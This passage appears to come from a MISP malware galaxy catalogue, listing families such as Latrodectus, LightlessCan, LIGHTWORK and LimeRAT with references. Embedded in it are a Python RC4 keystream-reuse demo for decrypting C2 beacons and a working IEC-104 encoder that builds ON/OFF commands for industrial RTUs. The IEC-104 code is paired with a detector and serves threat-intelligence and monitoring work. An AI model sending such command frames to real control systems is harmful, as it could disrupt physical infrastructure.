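STATIC_KEY = b"demo-static-key"
BEACON_1 = b"id=0001&cmd=systeminfo&status=ok"
BEACON_2 = b"id=0002&cmd=whoami&status=ok"


def demo() -> bytes:
    """Encrypt both beacons under one key; recover beacon 2 knowing only beacon 1."""
    c1 = rc4(STATIC_KEY, BEACON_1)
    c2 = rc4(STATIC_KEY, BEACON_2)
    # c1 XOR c2 == p1 XOR p2: the key itself is never needed for this step.
    assert xor_bytes(c1, c2) == xor_bytes(BEACON_1, BEACON_2)
    return recover_with_known_plaintext(c1, BEACON_1, c2)


if __name__ == "__main__":
    key, pt, ct = RC4_VECTOR
    assert rc4(key, pt) == ct
    print("recovered:", demo())
```

The keystream-reuse step is the reason a static RC4 key is a gift to defenders: one decrypted request (a check-in whose format is documented in any of the linked analyses) recovers the keystream for every other request of the same length or shorter, without ever extracting the key from the binary.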
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Latrodectus.
Known Synonyms |
---|
BLACKWIDOW |
IceNova |
Latrodectus |
Lotus |
Internal MISP references
UUID 841bb886-8c75-427f-9b57-537c546557e1
which can be used as unique global reference for Latrodectus
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus - webarchive
- https://www.embeeresearch.io/latrodectus-script-deobfuscation/ - webarchive
- https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus - webarchive
- https://twitter.com/Myrtus0x0/status/1732997981866209550 - webarchive
- https://exchange.xforce.ibmcloud.com/malware-analysis/guid:dab8a02f9161933bc2eff5ba4a5f8412 - webarchive
- https://any.run/malware-trends/latrodectus - webarchive
- https://cyble.com/blog/double-trouble-latrodectus-and-acr-stealer-observed-spreading-via-google-authenticator-phishing-site/ - webarchive
- https://embeeresearch.io/phishing-domain-analysis-with-passive-dns-latrodectus/ - webarchive
- https://www.rapid7.com/blog/post/2024/07/24/malware-campaign-lures-users-with-fake-w2-form/ - webarchive
- https://www.vmray.com/latrodectus-a-year-in-the-making/ - webarchive
- https://0x0d4y.blog/case-study-analyzing-and-implementing-string-decryption-algorithms-latrodectus/ - webarchive
- https://github.com/leandrofroes/malware-research/blob/main/Latrodectus/latrodectus_static_unpacker.py - webarchive
- https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39 - webarchive
- https://github.com/VenzoV/MalwareAnalysisReports/blob/main/Latrodectus/Latrodectus%20%22Littlehw%22.md - webarchive
- https://www.netskope.com/de/blog/latrodectus-rapid-evolution-continues-with-latest-new-payload-features - webarchive
- https://embee-research.ghost.io/phishing-domain-analysis-with-passive-dns-latrodectus/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice - webarchive
- https://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea - webarchive
- https://x.com/embee_research/status/1792826263738208343 - webarchive
- https://www.bitsight.com/blog/latrodectus-are-you-coming-back - webarchive
- https://www.esentire.com/blog/danabots-latest-move-deploying-icedid - webarchive
- https://www.netskope.com/blog/latrodectus-rapid-evolution-continues-with-latest-new-payload-features - webarchive
- https://www.logpoint.com/en/blog/latrodectus-the-wrath-of-black-widow/ - webarchive
- https://blog.reveng.ai/latrodectus-distribution-via-brc4/ - webarchive
- https://0x0d4y.blog/latrodectus-technical-analysis-of-the-new-icedid/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pronsis-loader-a-jphp-driven-malware-diverging-from-d3fck-loader/ - webarchive
- https://blog.krakz.fr/articles/latrodectus/ - webarchive
- https://www.forcepoint.com/blog/x-labs/inside-latrodectus-malware-phishing-campaign - webarchive
- https://www.malware-traffic-analysis.net/2024/03/07/index.html - webarchive
- https://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/ - webarchive
- https://research.openanalysis.net/latrodectus/config/emulation/2024/09/30/latrodectus.html - webarchive
- https://hunt.io/blog/latrodectus-malware-masquerades-as-ahnlab-security-software-to-infect-victims - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Laturo Stealer
Internal MISP references
UUID e1958a69-49c3-43a2-ba80-6e5cd5bbcd13
which can be used as unique global reference for Laturo Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LazarDoor
Internal MISP references
UUID 1045b4f1-5a85-4448-a7a9-abc964bdae72
which can be used as unique global reference for LazarDoor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LazarLoader
Internal MISP references
UUID 42bce8d3-8705-44fb-bd88-4af16c6bd28f
which can be used as unique global reference for LazarLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KillDisk (Lazarus)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KillDisk (Lazarus).
Known Synonyms |
---|
KillDisk.NBO |
Internal MISP references
UUID 6f377d0b-9eaa-474c-8cf8-0718ee2b0efc
which can be used as unique global reference for KillDisk (Lazarus)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus_killdisk - webarchive
- https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Laziok
Internal MISP references
UUID 686a9217-3978-47c0-9989-dd2a3438ba72
which can be used as unique global reference for Laziok
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok - webarchive
- https://www.gdatasoftware.com/blog/2015/05/24280-dissecting-the-kraken - webarchive
- https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector - webarchive
- https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LazyCat
Internal MISP references
UUID 454db469-724a-4084-873c-906abf91d0d5
which can be used as unique global reference for LazyCat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LCPDot
Internal MISP references
UUID 23dd327e-5d1d-4b75-993e-5d79d9fc0a70
which can be used as unique global reference for LCPDot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot - webarchive
- https://cn.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf - webarchive
- https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html - webarchive
- https://research.nccgroup.com/2022/05/05/north-koreas-lazarus-and-their-initial-access-trade-craft-using-social-media-and-social-engineering/ - webarchive
- https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf - webarchive
- https://vblocalhost.com/uploads/VB2021-Park.pdf - webarchive
- https://securelist.com/lazarus-trojanized-defi-app/106195/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LDR4
A further branch of the URSNIF collection of malware families. According to Mandiant, it no longer focuses on banking fraud but instead provides generic backdoor capabilities.
Internal MISP references
UUID c429622f-cbdf-47d6-88e8-091283ed5703
which can be used as unique global reference for LDR4
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Leakthemall
Ransomware.
Internal MISP references
UUID 526add8e-ed78-4e8e-8d4c-152570fe566e
which can be used as unique global reference for Leakthemall
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Leash
Internal MISP references
UUID 8faf7592-be5c-44af-b1ca-2bd8caec195d
which can be used as unique global reference for Leash
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lechiket
Internal MISP references
UUID 3df8cf32-cbbf-44f4-8b7b-b1a977138956
which can be used as unique global reference for Lechiket
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lemon Duck
Lemon Duck is a Monero crypto-mining malware with the capability to spread rapidly across an entire network. The malware runs its payload mainly in memory. Internal network spreading is performed via the SMB RCE vulnerability CVE-2017-0144 (EternalBlue) or brute-force attacks.
Internal MISP references
UUID ff1896f4-8774-4c15-9353-918e3dc2e840
which can be used as unique global reference for Lemon Duck
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lemonduck - webarchive
- https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/ - webarchive
- https://cybotsai.com/lemon-duck-attack/ - webarchive
- https://news.sophos.com/en-us/2019/10/01/lemon_duck-powershell-malware-cryptojacks-enterprise-networks/ - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/373/Bitdefender-PR-Whitepaper-LemonDuck-creat4826-en-EN-GenericUse.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/ - webarchive
- https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728 - webarchive
- https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/ - webarchive
- https://success.trendmicro.com/solution/000261916 - webarchive
- https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html - webarchive
- https://therecord.media/lemonduck-botnet-evolves-to-allow-hands-on-keyboard-intrusions/ - webarchive
- https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html - webarchive
- https://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html - webarchive
- https://asec.ahnlab.com/en/31811/ - webarchive
- https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Leouncia
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Leouncia.
Known Synonyms |
---|
shoco |
Internal MISP references
UUID 41da41aa-0729-428a-8b82-636600f8e230
which can be used as unique global reference for Leouncia
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lethic
Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam.
Internal MISP references
UUID 342f5c56-861c-4a06-b5db-85c3c424f51f
which can be used as unique global reference for Lethic
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic - webarchive
- http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html - webarchive
- http://www.malware-traffic-analysis.net/2017/11/02/index.html - webarchive
- http://resources.infosecinstitute.com/win32lethic-botnet-analysis/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LetMeOut
Internal MISP references
UUID 007697bc-463e-4f90-93e3-8f8fdeff147a
which can be used as unique global reference for LetMeOut
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LgoogLoader
LgoogLoader is an installer that drops three files: a batch file, an AutoIt interpreter, and an AutoIt script. After downloading, it executes the batch file.
Internal MISP references
UUID edf1bb94-cc6b-46fd-a922-18fd2a0f323f
which can be used as unique global reference for LgoogLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lgoogloader - webarchive
- https://inside.harfanglab.io/blog/articles/cyber-threat-intelligence/loader-galore-taskloader-at-the-start-of-a-pay-per-install-infection-chain/ - webarchive
- https://blog.polyswarm.io/nullmixer-drops-multiple-malware-families - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Liderc
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Liderc.
Known Synonyms |
---|
LEMPO |
Internal MISP references
UUID ed825d46-be1e-4d36-b828-1b85274773dd
which can be used as unique global reference for Liderc
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.liderc - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media - webarchive
- https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html - webarchive
- https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LIGHTBUNNY
Internal MISP references
UUID ea790924-8a81-4141-9e5c-14a205af170f
which can be used as unique global reference for LIGHTBUNNY
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LightlessCan
LightlessCan is a complex HTTP(S) RAT, that is a successor of the Lazarus RAT named BlindingCan.
In Q2 2022 and Q1 2023, it was deployed in targeted attacks against an aerospace company in Spain and a technology company in India.
Besides supporting the commands already present in BlindingCan, its most significant update is mimicked functionality of many native Windows commands: ipconfig, net, netsh advfirewall firewall, netstat, reg, sc, ping (for both IPv4 and IPv6), wmic process call create, nslookup, schtasks, systeminfo and arp.
These native commands are often abused by attackers once they have a foothold on the target system. LightlessCan executes their equivalents discreetly within the RAT itself rather than running them visibly as console processes. This provides stealth against both real-time monitoring solutions such as EDRs, which would otherwise see a new process created for each command, and post-mortem digital forensic tools.
LightlessCan uses RC6 to decrypt its configuration, and also to encrypt and decrypt its network traffic.
Internal MISP references
UUID 4a00dbe4-91b7-4cfc-a6a2-528ccc9a4303
which can be used as unique global reference for LightlessCan
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lightlesscan - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf - webarchive
- https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LightNeuron
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LightNeuron.
Known Synonyms |
---|
NETTRANS |
XTRANS |
Internal MISP references
UUID 96b0b8fa-79b6-4519-a794-f6f325f96fd7
which can be used as unique global reference for LightNeuron
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lightneuron - webarchive
- https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-hunter - webarchive
- https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://securelist.com/apt-trends-report-q2-2018/86487/ - webarchive
- https://www.welivesecurity.com/2019/05/07/turla-lightneuron-email-too-far/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lightning Stealer
Lightning Stealer can target more than 30 Firefox- and Chromium-based browsers and steals crypto wallets, Telegram data, Discord tokens and Steam user data. Unlike other info stealers, it stores all stolen data in JSON format for exfiltration.
Internal MISP references
UUID 48a21f7a-3dc9-4524-9628-10ed0f762bb4
which can be used as unique global reference for Lightning Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LIGHTRAIL
According to Mandiant, this is a tunneler, likely based on an open-source Socks4a proxy, that communicates using Azure cloud infrastructure.
Internal MISP references
UUID 32656e7e-6008-491b-b310-fb203a67b0c7
which can be used as unique global reference for LIGHTRAIL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LIGHTWORK
According to Mandiant, LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP. It crafts configurable IEC-104 ASDU messages to change the state of RTU IOAs to ON or OFF. It works in tandem with PIEHOP, which sets up its execution.
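To make the "configurable ASDU" concrete, here is an added example (not LIGHTWORK code, and not derived from it) that encodes and decodes the kind of IEC 60870-5-104 frame the description refers to: an I-format APDU carrying a C_SC_NA_1 single command with cause of transmission "activation". The encoding follows the public standard; the common address, IOA, sequence numbers and the TESTFR keep-alive frame are constructed for the demo. The parser side is what a network monitor would use to flag a state-changing command.

```python
"""IEC 60870-5-104 single-command APDU builder and parser.
Added example, not LIGHTWORK code; addresses and sequence numbers are constructed."""
import struct

C_SC_NA_1 = 45        # single command (ON/OFF), no time tag
C_DC_NA_1 = 46        # double command
C_SC_TA_1 = 58        # single command with CP56Time2a
C_DC_TA_1 = 59        # double command with CP56Time2a
COT_ACTIVATION = 6
STATE_CHANGE_TYPES = {C_SC_NA_1, C_DC_NA_1, C_SC_TA_1, C_DC_TA_1}


def build_single_command(common_addr: int, ioa: int, on: bool, *,
                         send_seq: int = 0, recv_seq: int = 0,
                         select: bool = False, originator: int = 0) -> bytes:
    """Return an I-format APDU carrying one C_SC_NA_1 with cause 'activation'."""
    sco = (1 if on else 0) | (0x80 if select else 0)        # bit0 SCS, bit7 S/E
    asdu = bytes([C_SC_NA_1, 0x01, COT_ACTIVATION, originator & 0xFF])
    asdu += struct.pack("<H", common_addr)                   # common address, LE
    asdu += ioa.to_bytes(3, "little") + bytes([sco])         # 3-byte IOA + SCO
    # APCI: start byte, length of what follows, then send/receive seq (N << 1).
    apci = struct.pack("<BBHH", 0x68, 4 + len(asdu),
                       (send_seq << 1) & 0xFFFF, (recv_seq << 1) & 0xFFFF)
    return apci + asdu


def parse_apdu(apdu: bytes) -> dict:
    """Decode an I-format APDU whose ASDU holds one command object; raise otherwise."""
    if len(apdu) < 6 or apdu[0] != 0x68 or apdu[1] != len(apdu) - 2:
        raise ValueError("not a well-formed APDU")
    if apdu[2] & 0x01:
        raise ValueError("S- or U-format frame, carries no ASDU")
    send_seq = struct.unpack("<H", apdu[2:4])[0] >> 1
    recv_seq = struct.unpack("<H", apdu[4:6])[0] >> 1
    asdu = apdu[6:]
    if len(asdu) < 10:
        raise ValueError("ASDU too short for one information object")
    type_id, vsq, cot, originator = asdu[0], asdu[1], asdu[2] & 0x3F, asdu[3]
    common_addr = struct.unpack("<H", asdu[4:6])[0]
    ioa = int.from_bytes(asdu[6:9], "little")
    qualifier = asdu[9]
    if type_id in (C_SC_NA_1, C_SC_TA_1):
        on = bool(qualifier & 0x01)                          # SCS: 1 = ON
    else:
        on = (qualifier & 0x03) == 2                         # DCS: 2 = ON, 1 = OFF
    return {
        "send_seq": send_seq, "recv_seq": recv_seq, "type_id": type_id,
        "num_objects": vsq & 0x7F, "cot": cot, "originator": originator,
        "common_addr": common_addr, "ioa": ioa,
        "on": on, "select": bool(qualifier & 0x80),
    }


def is_state_change(apdu: bytes) -> bool:
    """True for an activation of a single/double command: what a monitor alerts on."""
    try:
        fields = parse_apdu(apdu)
    except ValueError:
        return False
    return fields["type_id"] in STATE_CHANGE_TYPES and fields["cot"] == COT_ACTIVATION


# Constructed frames: station 1, IOA 100, switch ON; and a TESTFR-act U-frame.
DEMO_ON = build_single_command(common_addr=1, ioa=100, on=True)
DEMO_TESTFR = bytes.fromhex("680443000000")

if __name__ == "__main__":
    print(DEMO_ON.hex())
    print(parse_apdu(DEMO_ON))
    print(is_state_change(DEMO_ON), is_state_change(DEMO_TESTFR))
```

A monitor that keys on type IDs 45/46/58/59 with cause 6 sees the select step as well as the execute, since both carry the activation cause and differ only in the S/E bit; the TESTFR U-frame is included to show that keep-alive traffic is rejected by the parser rather than misread as a command.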
Internal MISP references
UUID 01cbe4cc-43ba-4bc8-9fee-9daf63dda335
which can be used as unique global reference for LIGHTWORK
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ligsterac
Internal MISP references
UUID 7d328c7b-7dc8-4891-bbd1-a05dedc8bac4
which can be used as unique global reference for Ligsterac
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lilith
Lilith is a console-based, ultra-lightweight RAT developed in C++. It features a straightforward set of commands that allows near-complete control of a machine.
Internal MISP references
UUID c443dc36-f439-46d8-8ce7-07d3532a412b
which can be used as unique global reference for Lilith
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/ - webarchive
- https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group - webarchive
- https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388 - webarchive
- https://github.com/werkamsus/Lilith - webarchive
- https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/ - webarchive
- https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/ - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research - webarchive
- https://asec.ahnlab.com/ko/58215/ - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479 - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
limedownloader
Internal MISP references
UUID a70436b1-559d-48af-836f-f46074cd8ef3
which can be used as unique global reference for limedownloader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
limeminer
Internal MISP references
UUID 3819bc21-8c15-48ee-8e68-ee2a0c5f82a7
which can be used as unique global reference for limeminer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LimePad
Internal MISP references
UUID 0cae4bcd-9656-434d-81c1-c55801b3eaa3
which can be used as unique global reference for LimePad
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LimeRAT
Simple yet powerful RAT for Windows machines. This project is simple and easy to understand. It should give you a general knowledge about dotNET malware and how it behaves.
Main Features
- .NET
  - Coded in Visual Basic .NET; the client requires the .NET Framework 2.0 or 4.0 dependency, and the server is 4.0
- Connection
  - Uses pastebin.com as the ip:port source instead of noip.com DNS, and also uses multiple ports
- Plugin
  - Uses a plugin system to decrease the stub's size and lower AV detection
- Encryption
  - The communication between server and client is encrypted with AES
- Spreading
  - Infects all files and folders on USB drives
- Bypass
  - Low AV detection and undetected startup method
- Lightweight
  - Payload size is about 25 KB
- Anti Virtual Machines
  - Uninstalls itself if the machine is virtual, to avoid scanning or analysis
- Ransomware
  - Encrypts files on all HDD and USB drives with the .Lime extension
- XMR Miner
  - High-performance Monero CPU miner with user idle/active optimizations
- DDoS
  - Creates a powerful DDoS attack to make an online service unavailable
- Crypto Stealer
  - Steals cryptocurrency-sensitive data
- Screen-Locker
  - Prevents the user from accessing their Windows GUI
- And more
  - On Connect Auto Task
  - Force enable Windows RDP
  - Persistence
  - File manager
  - Passwords stealer
  - Remote desktop
  - Bitcoin grabber
  - Downloader
  - Keylogger
Internal MISP references
UUID 771dbe6a-3f01-4bd4-8edd-070b2eb9df66
which can be used as unique global reference for LimeRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf - webarchive
- https://any.run/cybersecurity-blog/limerat-malware-analysis/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html - webarchive
- https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html - webarchive
- https://blog.reversinglabs.com/blog/rats-in-the-library - webarchive
- https://blog.yoroi.company/research/limerat-spreads-in-the-wild/ - webarchive
- https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html - webarchive
- https://lab52.io/blog/apt-c-36-recent-activity-analysis/ - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html - webarchive
- https://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/ - webarchive
- https://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/ - webarchive
- https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service - webarchive
- https://www.youtube.com/watch?v=x-g-ZLeX8GM - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt - webarchive
- https://threatmon.io/apt-blind-eagles-malware-arsenal-technical-analysis/ - webarchive
- https://github.com/NYAN-x-CAT/Lime-RAT/ - webarchive
- https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Limitail
Internal MISP references
UUID dcd1f76d-5a40-4c58-b01e-a749871fe50b
which can be used as unique global reference for Limitail
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LinseningSvr
Internal MISP references
UUID 9a66df8d-ce65-49d6-a648-c1a5ea58cbc2
which can be used as unique global reference for LinseningSvr
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LIONTAIL
Internal MISP references
UUID bad7ba1a-f945-436a-82ce-f125c82e2164
which can be used as unique global reference for LIONTAIL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Listrix
Internal MISP references
UUID 54c8a055-a4be-4ec0-9943-ecad929e0dac
which can be used as unique global reference for Listrix
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix - webarchive
- https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LiteDuke
According to CarbonBlack, LiteDuke is a third-stage backdoor. It appears to use the same dropper as PolyglotDuke. Its payload makes use of an AES-encrypted SQLite database to store its configuration. LiteDuke supports a large number of individual commands, including host information retrieval, file upload and download, and the ability to execute other code. LiteDuke C2 servers appear to be compromised servers, and the malware communicates with them using normal HTTP requests. It attempts to use a realistic User-Agent string to blend in better with normal HTTP traffic. ESET have dubbed it LiteDuke because it uses SQLite to store information such as its configuration.
Internal MISP references
UUID ae7352bd-86e9-455d-bdc3-0567886a8392
which can be used as unique global reference for LiteDuke
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LiteHTTP
According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system.
The source is on GitHub: https://github.com/zettabithf/LiteHTTP
Internal MISP references
UUID 2f9e1221-0a59-447b-a9e8-bedb010cd3d8
which can be used as unique global reference for LiteHTTP
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LOBSHOT
According to PCrisk, LOBSHOT is a type of malware with a feature called hVNC (Hidden Virtual Network Computing) that allows attackers to access a victim's computer without being noticed. The hVNC component is effective in evading fraud detection systems. LOBSHOT is also being used to carry out financial crimes through its banking-trojan and information-stealing functionalities.
Internal MISP references
UUID c30db30e-e29a-4f62-bda0-c284fa7c6f6d
which can be used as unique global reference for LOBSHOT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LockBit (Windows)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LockBit (Windows).
Known Synonyms |
---|
ABCD Ransomware |
Internal MISP references
UUID fd035735-1ab9-419d-a94c-d560612e970b
which can be used as unique global reference for LockBit (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022 - webarchive
- https://nationalcrimeagency.gov.uk/news/nca-leads-international-investigation-targeting-worlds-most-harmful-ransomware-group - webarchive
- https://www.ic3.gov/Media/News/2022/220204.pdf - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/ - webarchive
- https://www.cisa.gov/sites/default/files/2023-06/aa23-165a_understanding_TA_LockBit_0.pdf - webarchive
